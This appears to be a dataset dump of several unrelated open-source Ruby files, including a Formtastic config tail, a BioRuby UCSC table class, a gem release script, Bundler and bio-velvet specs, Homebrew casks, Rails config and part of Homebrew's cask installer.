# Formtastic::Helpers::FormHelper.default_form_model_class_proc = proc { |model_class_name| model_class_name }
# Allows to set a custom field_error_proc wrapper. By default this wrapper
# is disabled since `formtastic` already adds an error class to the LI tag
# containing the input.
# Formtastic::Helpers::FormHelper.formtastic_field_error_proc = proc { |html_tag, instance_tag| html_tag }
# You can opt-in to Formtastic's use of the HTML5 `required` attribute on `<input>`, `<select>`
# and `<textarea>` tags by setting this to true (defaults to false).
# Formtastic::FormBuilder.use_required_attribute = false
# You can opt-in to new HTML5 browser validations (for things like email and url inputs) by setting
# this to true. Doing so will omit the `novalidate` attribute from the `<form>` tag.
# See https://diveintohtml5.org/forms.html#validation for more info.
# Formtastic::FormBuilder.perform_browser_validations = true
# By creating custom input class finder, you can change how input classes are looked up.
# For example you can make it to search for TextInputFilter instead of TextInput.
# See # TODO: add link # for more information
# NOTE: this behavior will be default from Formtastic 4.0
Formtastic::FormBuilder.input_class_finder = Formtastic::InputClassFinder
# Define custom namespaces in which to look up your Input classes. Default is
# to look up in the global scope and in Formtastic::Inputs.
# Formtastic::FormBuilder.input_namespaces = [ ::Object, ::MyInputsModule, ::Formtastic::Inputs ]
# By creating custom action class finder, you can change how action classes are looked up.
# For example you can make it to search for MyButtonAction instead of ButtonAction.
# See # TODO: add link # for more information
# NOTE: this behavior will be default from Formtastic 4.0
Formtastic::FormBuilder.action_class_finder = Formtastic::ActionClassFinder
# Define custom namespaces in which to look up your Action classes. Default is
# to look up in the global scope and in Formtastic::Actions.
# Formtastic::FormBuilder.action_namespaces = [ ::Object, ::MyActionsModule, ::Formtastic::Actions ]
# Which columns to skip when automatically rendering a form without any fields specified.
# Formtastic::FormBuilder.skipped_columns = [:created_at, :updated_at, :created_on, :updated_on, :lock_version, :version]
| 55.052632 | 121 | 0.775972 |
b9e0dcc177930b1ac84afb0fbd3733a0754cf991 | 3,109 | # Copyright::
# Copyright (C) 2011 MISHIMA, Hiroyuki <missy at be.to / hmishima at nagasaki-u.ac.jp>
# License:: The Ruby licence (Ruby's / GPLv2 dual)
#
# In the rheMac2 database, this table is actually separated
# into "chr1_*", "chr2_*", etc. This class dynamically
# defines *::Chr1_*, *::Chr2_*, etc. The
# ChainMm9.find_by_interval method calls an appropriate class automatically.
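# Usage sketch (assuming an interval object accepted by Bio::Ucsc::Gi.wrap,
# e.g. one describing "chr1:1-2,000"):
#   Bio::Ucsc::RheMac2::ChainMm9.find_all_by_interval(interval)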
module Bio
module Ucsc
module RheMac2
class ChainMm9
KLASS = "ChainMm9"
KLASS_S = KLASS[0..0].downcase + KLASS[1..-1]
Bio::Ucsc::RheMac2::CHROMS.each do |chr|
class_eval %!
class #{chr[0..0].upcase + chr[1..-1]}_#{KLASS} < DBConnection
self.table_name = "#{chr[0..0].downcase + chr[1..-1]}_#{KLASS_S}"
self.primary_key = nil
self.inheritance_column = nil
          def self.find_by_interval(interval, opt = {:partial => true})
            interval = Bio::Ucsc::Gi.wrap(interval)
find_first_or_all_by_interval(interval, :first, opt)
end
          def self.find_all_by_interval(interval, opt = {:partial => true})
            interval = Bio::Ucsc::Gi.wrap(interval)
find_first_or_all_by_interval(interval, :all, opt)
end
          def self.find_first_or_all_by_interval(interval, first_all, opt)
            interval = Bio::Ucsc::Gi.wrap(interval)
zstart = interval.zero_start
zend = interval.zero_end
if opt[:partial] == true
where = <<-SQL
tName = :chrom
AND bin in (:bins)
AND ((tStart BETWEEN :zstart AND :zend)
OR (tEnd BETWEEN :zstart AND :zend)
OR (tStart <= :zstart AND tEnd >= :zend))
SQL
else
where = <<-SQL
tName = :chrom
AND bin in (:bins)
AND ((tStart BETWEEN :zstart AND :zend)
AND (tEnd BETWEEN :zstart AND :zend))
SQL
end
cond = {
:chrom => interval.chrom,
:bins => Bio::Ucsc::UcscBin.bin_all(zstart, zend),
:zstart => zstart,
:zend => zend,
}
self.find(first_all,
{ :select => "*",
:conditions => [where, cond], })
end
end
!
end # each chromosome
      def self.find_by_interval(interval, opt = {:partial => true})
        interval = Bio::Ucsc::Gi.wrap(interval)
chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1]
chr_klass = self.const_get("#{chrom}_#{KLASS}")
chr_klass.__send__(:find_by_interval, interval, opt)
end
      def self.find_all_by_interval(interval, opt = {:partial => true})
        interval = Bio::Ucsc::Gi.wrap(interval)
chrom = interval.chrom[0..0].upcase + interval.chrom[1..-1]
chr_klass = self.const_get("#{chrom}_#{KLASS}")
chr_klass.__send__(:find_all_by_interval, interval, opt)
end
end # class
  end # module RheMac2
end # module Ucsc
end # module Bio
| 37.914634 | 120 | 0.547121 |
61bfca8a11205d61e46144817f145166f8b696f3 | 4,952 | # frozen_string_literal: true
desc "Releases pending gems for a pull request"
long_desc \
"This tool continues the releases associated with a release pull request." \
" It is normally used to retry or continue releases that aborted due to" \
" an error. This tool is normally called from a GitHub Actions workflow," \
" but can also be executed locally if the proper credentials are present."
required_arg :release_pr, accept: Integer do
desc "Release pull request number. Required."
end
flag_group desc: "Flags" do
flag :gh_pages_dir, "--gh-pages-dir=VAL" do
desc "The directory to use for the gh-pages branch"
long_desc \
"Set to the path of a directory to use as the gh-pages workspace when" \
" building and pushing gem documentation. If left unset, a temporary" \
" directory will be created (and removed when finished)."
end
flag :git_remote, "--git-remote=VAL" do
default "origin"
desc "The name of the git remote"
long_desc \
"The name of the git remote pointing at the canonical repository." \
" Defaults to 'origin'."
end
flag :sha, "--sha=VAL" do
desc "Override the SHA for the release"
long_desc \
"The SHA to release from. This can be used if additional commits" \
" needed to be done to fix the release. If not given, the merge SHA" \
" of the pull request is used."
end
flag :rubygems_api_key, "--rubygems-api-key=VAL" do
desc "Set the Rubygems API key"
long_desc \
"Use the given Rubygems API key when pushing to Rubygems. Required if" \
" and only if there is no current setting in the home Rubygems configs."
end
flag :skip_checks, "--[no-]skip-checks" do
desc "Disable pre-release checks"
long_desc \
"If set, all pre-release checks are disabled. This may occasionally be" \
" useful to repair a broken release, but is generally not recommended."
end
flag :enable_releases, "--enable-releases=VAL" do
default "true"
desc "Control whether to enable releases."
long_desc \
"If set to 'true', releases will be enabled. Any other value will" \
" result in dry-run mode, meaning it will go through the motions," \
" create a GitHub release, and update the release pull request if" \
" applicable, but will not actually push the gem to Rubygems or push" \
" the docs to gh-pages."
end
flag :yes, "--yes", "-y" do
desc "Automatically answer yes to all confirmations"
end
end
include :exec, exit_on_nonzero_status: true
include :terminal, styled: true
def run
require "release_utils"
require "release_performer"
::Dir.chdir(context_directory)
@utils = ReleaseUtils.new(self)
[:gh_pages_dir, :rubygems_api_key].each do |key|
set(key, nil) if get(key).to_s.empty?
end
verify_release_pr
setup_git
perform_pending_releases
cleanup_git
end
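# Loads the release PR and confirms it carries the release pending or
# release error label, prompting for confirmation (unless --yes is set)
# when it does not.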
def verify_release_pr
@pr_info = @utils.load_pr(release_pr)
@utils.error("Could not load pull request ##{release_pr}") unless @pr_info
expected_labels = [@utils.release_pending_label, @utils.release_error_label]
return if @pr_info["labels"].any? { |label| expected_labels.include?(label["name"]) }
warning = "PR #{release_pr} doesn't have the release pending or release error label."
if yes
logger.warn(warning)
return
end
unless confirm("#{warning} Proceed anyway? ", :bold, default: false)
@utils.error("Release aborted.")
end
end
def perform_pending_releases
performer = create_performer
github_check_errors = skip_checks ? [] : @utils.wait_github_checks
if github_check_errors.empty?
@utils.released_gems_and_versions(@pr_info).each do |gem_name, gem_version|
if performer.instance(gem_name, gem_version).perform
puts("SUCCESS: Released #{gem_name} #{gem_version}", :bold, :green)
end
end
else
performer.add_extra_errors(github_check_errors)
end
if performer.report_results
puts("All releases completed successfully", :bold, :green)
else
@utils.error("Releases reported failure")
end
end
def setup_git
@original_branch = @utils.current_branch
merge_sha = @pr_info["merge_commit_sha"]
release_sha = sha || merge_sha
exec(["git", "fetch", "--depth=1", "origin", release_sha])
exec(["git", "fetch", "--depth=2", "origin", merge_sha])
exec(["git", "checkout", release_sha])
end
def cleanup_git
exec(["git", "checkout", @original_branch]) if @original_branch
end
def create_performer
dry_run = /^t/i =~ enable_releases.to_s ? false : true
ReleasePerformer.new(@utils,
skip_checks: skip_checks,
rubygems_api_key: rubygems_api_key,
git_remote: git_remote,
gh_pages_dir: gh_pages_dir,
gh_token: ::ENV["GITHUB_TOKEN"],
pr_info: @pr_info,
check_exists: true,
dry_run: dry_run)
end
| 34.873239 | 87 | 0.681543 |
2662c129538f4f740211dca3a6d5382e4f16c94c | 3,120 | # frozen_string_literal: true
RSpec.describe "bundle install with :allow_offline_install" do
before do
bundle "config set allow_offline_install true"
end
context "with no cached data locally" do
it "still installs" do
skip "corrupt test gem" if Gem.win_platform?
install_gemfile! <<-G, :artifice => "compact_index"
source "http://testgemserver.local"
gem "rack-obama"
G
expect(the_bundle).to include_gem("rack 1.0")
end
it "still fails when the network is down" do
install_gemfile <<-G, :artifice => "fail"
source "http://testgemserver.local"
gem "rack-obama"
G
expect(err).to include("Could not reach host testgemserver.local.")
expect(the_bundle).to_not be_locked
end
end
context "with cached data locally" do
it "will install from the compact index" do
skip "corrupt test gem" if Gem.win_platform?
system_gems ["rack-1.0.0"], :path => :bundle_path
bundle! "config set clean false"
install_gemfile! <<-G, :artifice => "compact_index"
source "http://testgemserver.local"
gem "rack-obama"
gem "rack", "< 1.0"
G
expect(the_bundle).to include_gems("rack-obama 1.0", "rack 0.9.1")
gemfile <<-G
source "http://testgemserver.local"
gem "rack-obama"
G
bundle! :update, :artifice => "fail", :all => true
expect(last_command.stdboth).to include "Using the cached data for the new index because of a network error"
expect(the_bundle).to include_gems("rack-obama 1.0", "rack 1.0.0")
end
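    # Prepends a stub +git+ to PATH that fails remote operations
    # (fetch/clone) and re-execs the real git for everything else.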
def break_git_remote_ops!
FileUtils.mkdir_p(tmp("broken_path"))
File.open(tmp("broken_path/git"), "w", 0o755) do |f|
f.puts strip_whitespace(<<-RUBY)
#!/usr/bin/env ruby
if %w(fetch --force --quiet --tags refs/heads/*:refs/heads/*).-(ARGV).empty? || %w(clone --bare --no-hardlinks --quiet).-(ARGV).empty?
warn "git remote ops have been disabled"
exit 1
end
ENV["PATH"] = ENV["PATH"].sub(/^.*?:/, "")
exec("git", *ARGV)
RUBY
end
old_path = ENV["PATH"]
ENV["PATH"] = "#{tmp("broken_path")}:#{ENV["PATH"]}"
yield if block_given?
ensure
ENV["PATH"] = old_path if block_given?
end
it "will install from a cached git repo" do
skip "doesn't print errors" if Gem.win_platform?
git = build_git "a", "1.0.0", :path => lib_path("a")
update_git("a", :path => git.path, :branch => "new_branch")
install_gemfile! <<-G
gem "a", :git => #{git.path.to_s.dump}
G
break_git_remote_ops! { bundle! :update, :all => true }
expect(err).to include("Using cached git data because of network errors")
expect(the_bundle).to be_locked
break_git_remote_ops! do
install_gemfile! <<-G
gem "a", :git => #{git.path.to_s.dump}, :branch => "new_branch"
G
end
expect(err).to include("Using cached git data because of network errors")
expect(the_bundle).to be_locked
end
end
end
| 31.515152 | 144 | 0.605769 |
ab44d37bebf16be599847516c4156322feb75a90 | 1,678 | cask 'keybase' do
version '1.0.47-20180508010858,c06519b740'
sha256 'd58d857a72d5710c68b42fb7432d11e46edb6e393fc66d0e5961b4ba4be26bb4'
url "https://prerelease.keybase.io/darwin-updates/Keybase-#{version.before_comma}%2B#{version.after_comma}.zip"
appcast 'https://prerelease.keybase.io/update-darwin-prod-v2.json',
checkpoint: 'a2ca0b317f0217e88d8aae454fda13f51bd842b37f515639ae568de9ce459c08'
name 'Keybase'
homepage 'https://keybase.io/'
auto_updates true
app 'Keybase.app'
postflight do
system_command "#{appdir}/Keybase.app/Contents/SharedSupport/bin/keybase",
args: ['install-auto']
end
uninstall delete: '/Library/PrivilegedHelperTools/keybase.Helper',
launchctl: 'keybase.Helper',
login_item: 'Keybase',
signal: [
['TERM', 'keybase.Electron'],
['TERM', 'keybase.ElectronHelper'],
['KILL', 'keybase.Electron'],
['KILL', 'keybase.ElectronHelper'],
],
script: {
executable: "#{appdir}/Keybase.app/Contents/SharedSupport/bin/keybase",
args: ['uninstall'],
}
zap trash: [
'~/Library/Application Support/Keybase',
'~/Library/Caches/Keybase',
'~/Library/Group Containers/keybase',
'~/Library/Logs/Keybase*',
'~/Library/Logs/keybase*',
'~/Library/Preferences/keybase*',
'/Library/Logs/keybase*',
],
rmdir: '/keybase'
end
| 37.288889 | 113 | 0.557211 |
ff2b04db66853cfcdf8fbd28e0e6d2e45a03b17e | 247 | class BadChecksum < TestCask
version '1.2.3'
sha256 'badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb'
url TestHelper.local_binary_url('caffeine.zip')
homepage 'http://example.com/local-caffeine'
app 'Caffeine.app'
end
| 24.7 | 75 | 0.793522 |
4a4a25ea5318fcf9492ff9bd4e329118713bc5fc | 1,253 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module FarmersMarkets
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 34.805556 | 82 | 0.775738 |
187c88b96004c2912b2d47a4e9fa30e7c4eac3f3 | 2,038 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe "binary sequence store" do
it "should be able to load sequences" do
path = File.join TEST_DATA_DIR, '1', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs[1].should == 'CACTTATCTCTACCAAAGATCACGATTTAGAATCAAACTATAAAGTTTTAGAAGATAAAGTAACAACTTATACATGGGGA'
seqs[77].should == 'CCTGTACCTGGAAGTGAAATACCAGCATAGTTTTTAATTTGTACATTAAATAATACATTGCCATCATTCATAGTAATATTATTTATTATACTTCCAGCTTCATTGCCATTAGTTACAGATATAGTTGCTTGACCAGTATACTCTCCATTATCATCTTTTTGAGCTGTTATAGTAACTTTTACTGGTTCTTTTAAAAGGCTATACCCTTTAGGAGCTTTTTCTTCTTTTATAAAGTAATCTCCTTCTTTTAAACCAGTAAATATAACTCGTCCATTTTTATCAGTTACACCCTTTCCTTTTAATAAAACCACATTTCCAGTAGAATCATACGTATATTTACCAATTACAT'
end
it "should be #length" do
path = File.join TEST_DATA_DIR, '1', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs.length.should == 77
end
it 'should respect array boundaries' do
path = File.join TEST_DATA_DIR, '1', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
expect {
seqs[0]
}.to raise_error
expect {
seqs[78]
}.to raise_error
end
it 'should be able to understand mates' do
path = File.join TEST_DATA_DIR, '2', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs.is_second_in_pair?(1).should == false
seqs.is_second_in_pair?(2).should == true
seqs.is_second_in_pair?(5).should == false
seqs.pair_id(1).should == 2
seqs.pair_id(2).should == 1
seqs.pair_id(5).should == 6
seqs.pair_id(6).should == 5
end
it 'should be able to understand non-mates and mates in the same run' do
path = File.join TEST_DATA_DIR, '5_singles_and_pairs', 'CnyUnifiedSeq'
seqs = Bio::Velvet::Underground::BinarySequenceStore.new path
seqs.pair_id(1).should == nil
seqs.pair_id(50000).should == nil
seqs.pair_id(50001).should == 50002
seqs.pair_id(100000).should == 99999
end
end
| 41.591837 | 374 | 0.748773 |
1cdbfe08a49726ac96e328811617ada44baaa0ef | 1,461 | module HeadlineChoice
def get_headlines(source)
@headlines = []
case source.to_s
when "espn"
self.scrape_espn
get_choice("espn")
when "mlb"
self.scrape_mlb
get_choice("mlb")
when "cbs"
self.scrape_cbs
get_choice("cbs")
when "fox"
self.scrape_fox
get_choice("fox")
end
end
def get_choice(source)
puts "\033[0;36mWhich story would you like to read?\033[0m"
puts "0. Back to the main menu"
@headlines.each.with_index(1) do |headline, i|
puts "#{i}. #{headline.title}"
end
case source
when "espn"
get_source = "espn_stories"
when "nfl"
get_source = "mlb_stories"
when "cbs"
get_source = "cbs_stories"
when "fox"
get_source = "fox_stories"
end
input = gets.strip.downcase
if input == "0"
puts ""
CLI.new.call
elsif input == "1"
Story.send(get_source, @headlines[0].url)
elsif input == "2"
Story.send(get_source, @headlines[1].url)
elsif input == "3"
Story.send(get_source, @headlines[2].url)
elsif input == "4"
Story.send(get_source, @headlines[3].url)
elsif input == "5"
Story.send(get_source, @headlines[4].url)
else
puts ""
puts "\033[0;33mInvalid entry...\033[0m"
get_choice(source)
end
end
end | 24.762712 | 65 | 0.546201 |
336ac9f314192a87625b99aa8036d3aacbe47ac2 | 767 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
def setup
@base_title = 'Post Blog Service'
end
test 'should get root' do
get root_path
assert_response :success
end
test 'should get home' do
get root_path
assert_response :success
assert_select 'title', 'Post Blog Service'
end
test 'should get help' do
get help_path
assert_response :success
assert_select 'title', "Help | #{@base_title}"
end
test 'should get about' do
get about_path
assert_response :success
assert_select 'title', "About | #{@base_title}"
end
test 'should get contact' do
get contact_path
assert_response :success
assert_select 'title', "Contact | #{@base_title}"
end
end
| 23.242424 | 65 | 0.70013 |
1cb4da6273db9e9dbf86e33539fbfd52626bbb20 | 42 | module LunarShell
VERSION = "0.5.2"
end
| 10.5 | 19 | 0.690476 |
6284d1b1d50ed46d76ca0bb2d28d71e0168f8c35 | 969 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2019_07_22_181356) do
create_table "posts", force: :cascade do |t|
t.string "title"
t.text "description"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 42.130435 | 86 | 0.768834 |
ed69a5f5cecb5028148db1fe0aac15ecbf70e268 | 17,138 | # typed: false
# frozen_string_literal: true
require "formula_installer"
require "unpack_strategy"
require "utils/topological_hash"
require "cask/config"
require "cask/download"
require "cask/staged"
require "cask/quarantine"
require "cgi"
module Cask
# Installer for a {Cask}.
#
# @api private
class Installer
extend T::Sig
extend Predicable
# TODO: it is unwise for Cask::Staged to be a module, when we are
# dealing with both staged and unstaged casks here. This should
# either be a class which is only sometimes instantiated, or there
# should be explicit checks on whether staged state is valid in
# every method.
include Staged
def initialize(cask, command: SystemCommand, force: false,
skip_cask_deps: false, binaries: true, verbose: false,
zap: false, require_sha: false, upgrade: false,
installed_as_dependency: false, quarantine: true,
verify_download_integrity: true, quiet: false)
@cask = cask
@command = command
@force = force
@skip_cask_deps = skip_cask_deps
@binaries = binaries
@verbose = verbose
@zap = zap
@require_sha = require_sha
@reinstall = false
@upgrade = upgrade
@installed_as_dependency = installed_as_dependency
@quarantine = quarantine
@verify_download_integrity = verify_download_integrity
@quiet = quiet
end
attr_predicate :binaries?, :force?, :skip_cask_deps?, :require_sha?,
:reinstall?, :upgrade?, :verbose?, :zap?, :installed_as_dependency?,
:quarantine?, :quiet?
def self.caveats(cask)
odebug "Printing caveats"
caveats = cask.caveats
return if caveats.empty?
Homebrew.messages.record_caveats(cask.token, caveats)
<<~EOS
#{ohai_title "Caveats"}
#{caveats}
EOS
end
sig { params(quiet: T.nilable(T::Boolean), timeout: T.nilable(T.any(Integer, Float))).void }
def fetch(quiet: nil, timeout: nil)
odebug "Cask::Installer#fetch"
verify_has_sha if require_sha? && !force?
download(quiet: quiet, timeout: timeout)
satisfy_dependencies
end
def stage
odebug "Cask::Installer#stage"
Caskroom.ensure_caskroom_exists
extract_primary_container
save_caskfile
rescue => e
purge_versioned_files
raise e
end
def install
start_time = Time.now
odebug "Cask::Installer#install"
old_config = @cask.config
if @cask.installed? && !force? && !reinstall? && !upgrade?
return if quiet?
raise CaskAlreadyInstalledError, @cask
end
check_conflicts
print caveats
fetch
uninstall_existing_cask if reinstall?
backup if force? && @cask.staged_path.exist? && @cask.metadata_versioned_path.exist?
oh1 "Installing Cask #{Formatter.identifier(@cask)}"
opoo "macOS's Gatekeeper has been disabled for this Cask" unless quarantine?
stage
@cask.config = @cask.default_config.merge(old_config)
install_artifacts
::Utils::Analytics.report_event("cask_install", @cask.token) unless @cask.tap&.private?
purge_backed_up_versioned_files
puts summary
end_time = Time.now
Homebrew.messages.package_installed(@cask.token, end_time - start_time)
rescue
restore_backup
raise
end
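# A minimal usage sketch of the install flow above (hypothetical token; the
# loader call mirrors the CaskLoader usage elsewhere in this file):
#
#   cask = CaskLoader.load("some-token")
#   Installer.new(cask, verbose: true).install
#
# Passing force: true permits installing over an existing staged copy, and the
# rescue above rolls back to the backup on failure.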
def check_conflicts
return unless @cask.conflicts_with
@cask.conflicts_with[:cask].each do |conflicting_cask|
if (match = conflicting_cask.match(HOMEBREW_TAP_CASK_REGEX))
conflicting_cask_tap = Tap.fetch(match[1], match[2])
next unless conflicting_cask_tap.installed?
end
conflicting_cask = CaskLoader.load(conflicting_cask)
raise CaskConflictError.new(@cask, conflicting_cask) if conflicting_cask.installed?
rescue CaskUnavailableError
next # Ignore conflicting Casks that do not exist.
end
end
def reinstall
odebug "Cask::Installer#reinstall"
@reinstall = true
install
end
def uninstall_existing_cask
return unless @cask.installed?
# use the same cask file that was used for installation, if possible
installed_caskfile = @cask.installed_caskfile
installed_cask = begin
installed_caskfile.exist? ? CaskLoader.load(installed_caskfile) : @cask
rescue CaskInvalidError # could be thrown by call to CaskLoader#load with outdated caskfile
@cask # default
end
# Always force uninstallation, ignore method parameter
cask_installer = Installer.new(installed_cask, verbose: verbose?, force: true, upgrade: upgrade?)
zap? ? cask_installer.zap : cask_installer.uninstall
end
sig { returns(String) }
def summary
s = +""
s << "#{Homebrew::EnvConfig.install_badge} " unless Homebrew::EnvConfig.no_emoji?
s << "#{@cask} was successfully #{upgrade? ? "upgraded" : "installed"}!"
s.freeze
end
sig { returns(Download) }
def downloader
@downloader ||= Download.new(@cask, quarantine: quarantine?)
end
sig { params(quiet: T.nilable(T::Boolean), timeout: T.nilable(T.any(Integer, Float))).returns(Pathname) }
def download(quiet: nil, timeout: nil)
# Store cask download path in cask to prevent multiple downloads in a row when checking if it's outdated
@cask.download ||= downloader.fetch(quiet: quiet, verify_download_integrity: @verify_download_integrity,
timeout: timeout)
end
def verify_has_sha
odebug "Checking cask has checksum"
return unless @cask.sha256 == :no_check
raise CaskError, <<~EOS
Cask '#{@cask}' does not have a sha256 checksum defined and was not installed.
This means you have the #{Formatter.identifier("--require-sha")} option set, perhaps in your HOMEBREW_CASK_OPTS.
EOS
end
def primary_container
@primary_container ||= begin
downloaded_path = download(quiet: true)
UnpackStrategy.detect(downloaded_path, type: @cask.container&.type, merge_xattrs: true)
end
end
def extract_primary_container(to: @cask.staged_path)
odebug "Extracting primary container"
odebug "Using container class #{primary_container.class} for #{primary_container.path}"
basename = downloader.basename
if (nested_container = @cask.container&.nested)
Dir.mktmpdir do |tmpdir|
tmpdir = Pathname(tmpdir)
primary_container.extract(to: tmpdir, basename: basename, verbose: verbose?)
FileUtils.chmod_R "+rw", tmpdir/nested_container, force: true, verbose: verbose?
UnpackStrategy.detect(tmpdir/nested_container, merge_xattrs: true)
.extract_nestedly(to: to, verbose: verbose?)
end
else
primary_container.extract_nestedly(to: to, basename: basename, verbose: verbose?)
end
return unless quarantine?
return unless Quarantine.available?
Quarantine.propagate(from: primary_container.path, to: to)
end
def install_artifacts
artifacts = @cask.artifacts
already_installed_artifacts = []
odebug "Installing artifacts"
odebug "#{artifacts.length} #{"artifact".pluralize(artifacts.length)} defined", artifacts
artifacts.each do |artifact|
next unless artifact.respond_to?(:install_phase)
odebug "Installing artifact of class #{artifact.class}"
next if artifact.is_a?(Artifact::Binary) && !binaries?
artifact.install_phase(command: @command, verbose: verbose?, force: force?)
already_installed_artifacts.unshift(artifact)
end
save_config_file
save_download_sha if @cask.version.latest?
rescue => e
begin
already_installed_artifacts.each do |artifact|
if artifact.respond_to?(:uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.post_uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
ensure
purge_versioned_files
raise e
end
end
# TODO: move dependencies to a separate class,
# dependencies should also apply for `brew cask stage`,
# override dependencies with `--force` or perhaps `--force-deps`
def satisfy_dependencies
return unless @cask.depends_on
macos_dependencies
arch_dependencies
cask_and_formula_dependencies
end
def macos_dependencies
return unless @cask.depends_on.macos
return if @cask.depends_on.macos.satisfied?
raise CaskError, @cask.depends_on.macos.message(type: :cask)
end
def arch_dependencies
return if @cask.depends_on.arch.nil?
@current_arch ||= { type: Hardware::CPU.type, bits: Hardware::CPU.bits }
return if @cask.depends_on.arch.any? do |arch|
arch[:type] == @current_arch[:type] &&
Array(arch[:bits]).include?(@current_arch[:bits])
end
raise CaskError,
"Cask #{@cask} depends on hardware architecture being one of " \
"[#{@cask.depends_on.arch.map(&:to_s).join(", ")}], " \
"but you are running #{@current_arch}."
end
def collect_cask_and_formula_dependencies
return @cask_and_formula_dependencies if @cask_and_formula_dependencies
graph = ::Utils::TopologicalHash.graph_package_dependencies(@cask)
raise CaskSelfReferencingDependencyError, @cask.token if graph[@cask].include?(@cask)
::Utils::TopologicalHash.graph_package_dependencies(primary_container.dependencies, graph)
begin
@cask_and_formula_dependencies = graph.tsort - [@cask]
rescue TSort::Cyclic
strongly_connected_components = graph.strongly_connected_components.sort_by(&:count)
cyclic_dependencies = strongly_connected_components.last - [@cask]
raise CaskCyclicDependencyError.new(@cask.token, cyclic_dependencies.to_sentence)
end
end
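# Illustrative sketch of the ordering guarantee above, using Ruby's TSort the
# same way ::Utils::TopologicalHash does (a standalone example, not part of
# the installer):
#
#   require "tsort"
#
#   class DepGraph < Hash
#     include TSort
#     alias tsort_each_node each_key
#     def tsort_each_child(node, &block)
#       fetch(node).each(&block)
#     end
#   end
#
#   DepGraph[{ a: [:b], b: [:c], c: [] }].tsort
#   # => [:c, :b, :a] (dependencies sort before their dependents)
#   DepGraph[{ a: [:b], b: [:a] }].tsort
#   # raises TSort::Cyclic, which the method above reports as
#   # CaskCyclicDependencyError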
def missing_cask_and_formula_dependencies
collect_cask_and_formula_dependencies.reject do |cask_or_formula|
installed = if cask_or_formula.respond_to?(:any_version_installed?)
cask_or_formula.any_version_installed?
else
cask_or_formula.try(:installed?)
end
installed && (cask_or_formula.respond_to?(:optlinked?) ? cask_or_formula.optlinked? : true)
end
end
def cask_and_formula_dependencies
return if installed_as_dependency?
formulae_and_casks = collect_cask_and_formula_dependencies
return if formulae_and_casks.empty?
missing_formulae_and_casks = missing_cask_and_formula_dependencies
if missing_formulae_and_casks.empty?
puts "All formula dependencies satisfied."
return
end
ohai "Installing dependencies: #{missing_formulae_and_casks.map(&:to_s).join(", ")}"
missing_formulae_and_casks.each do |cask_or_formula|
if cask_or_formula.is_a?(Cask)
if skip_cask_deps?
opoo "`--skip-cask-deps` is set; skipping installation of #{cask_or_formula}."
next
end
Installer.new(
cask_or_formula,
binaries: binaries?,
verbose: verbose?,
installed_as_dependency: true,
force: false,
).install
else
fi = FormulaInstaller.new(
cask_or_formula,
**{
show_header: true,
installed_as_dependency: true,
installed_on_request: false,
verbose: verbose?,
}.compact,
)
fi.prelude
fi.fetch
fi.install
fi.finish
end
end
end
def caveats
self.class.caveats(@cask)
end
def save_caskfile
old_savedir = @cask.metadata_timestamped_path
return if @cask.source.blank?
savedir = @cask.metadata_subdir("Casks", timestamp: :now, create: true)
(savedir/"#{@cask.token}.rb").write @cask.source
old_savedir&.rmtree
end
def save_config_file
@cask.config_path.atomic_write(@cask.config.to_json)
end
def save_download_sha
@cask.download_sha_path.atomic_write(@cask.new_download_sha) if @cask.checksumable?
end
def uninstall
oh1 "Uninstalling Cask #{Formatter.identifier(@cask)}"
uninstall_artifacts(clear: true)
if !reinstall? && !upgrade?
remove_download_sha
remove_config_file
end
purge_versioned_files
purge_caskroom_path if force?
end
def remove_config_file
FileUtils.rm_f @cask.config_path
@cask.config_path.parent.rmdir_if_possible
end
def remove_download_sha
FileUtils.rm_f @cask.download_sha_path if @cask.download_sha_path.exist?
end
def start_upgrade
uninstall_artifacts
backup
end
def backup
@cask.staged_path.rename backup_path
@cask.metadata_versioned_path.rename backup_metadata_path
end
def restore_backup
return if !backup_path.directory? || !backup_metadata_path.directory?
Pathname.new(@cask.staged_path).rmtree if @cask.staged_path.exist?
Pathname.new(@cask.metadata_versioned_path).rmtree if @cask.metadata_versioned_path.exist?
backup_path.rename @cask.staged_path
backup_metadata_path.rename @cask.metadata_versioned_path
end
def revert_upgrade
opoo "Reverting upgrade for Cask #{@cask}"
restore_backup
install_artifacts
end
def finalize_upgrade
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
purge_backed_up_versioned_files
puts summary
end
def uninstall_artifacts(clear: false)
artifacts = @cask.artifacts
odebug "Uninstalling artifacts"
